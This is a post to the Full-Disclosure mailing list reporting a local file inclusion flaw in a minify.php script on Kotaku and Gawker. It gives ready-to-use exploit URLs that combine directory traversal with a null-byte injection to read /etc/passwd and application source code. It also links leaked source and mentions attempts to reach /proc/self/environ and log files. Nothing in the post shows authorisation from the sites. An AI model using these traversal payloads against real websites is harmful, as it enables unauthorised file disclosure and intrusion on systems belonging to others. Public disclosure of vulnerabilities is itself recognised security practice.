-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Thought I'd share this...found an LFI on gawker which is on the same server as Kotaku and other sites part of their 'network' http://kotaku.com/assets/minify.php?fsid=dfdsf&type=sads&sb=../../.. /../../../../../../../etc/passwd%00 ^ works for gawker as well, just replace the name Full source code of the offending page http://pastebin.com/eWuExuke newline characters are stripped out however... This was the original 'LFI' I used to get the source code http://gawker.com/assets/minify.php?base=/assets/base.v9/css/../../l ib/jsmin.php%00&files=asfdf.css It seems to be fixed today though. But the other LFI above still works :D AFAIK it's not exploitable beyond the obvious information disclosures, as they don't allow read access to logfiles, and /proc/self/environ is unreadable. Still amusing to find this on there. -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkx9aS4ACgkQ3nE+T38NspftqgP+N5mPHgA/n5JzGtekqQv6HpbcFS/W iL4xh7OpfZISj7GXQJZjv40muLEkQFEgEZmNnX+Mw5y8ByLNqkDjbEULdLPe3XjB4TEy TrkzY2jRbvyO+KWzBs1jFFrAAbdK+UhYt94ELX/optiusAUWI3ZoWsh1umateF67sLJ0 RlpDn5Y= =ryBU -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/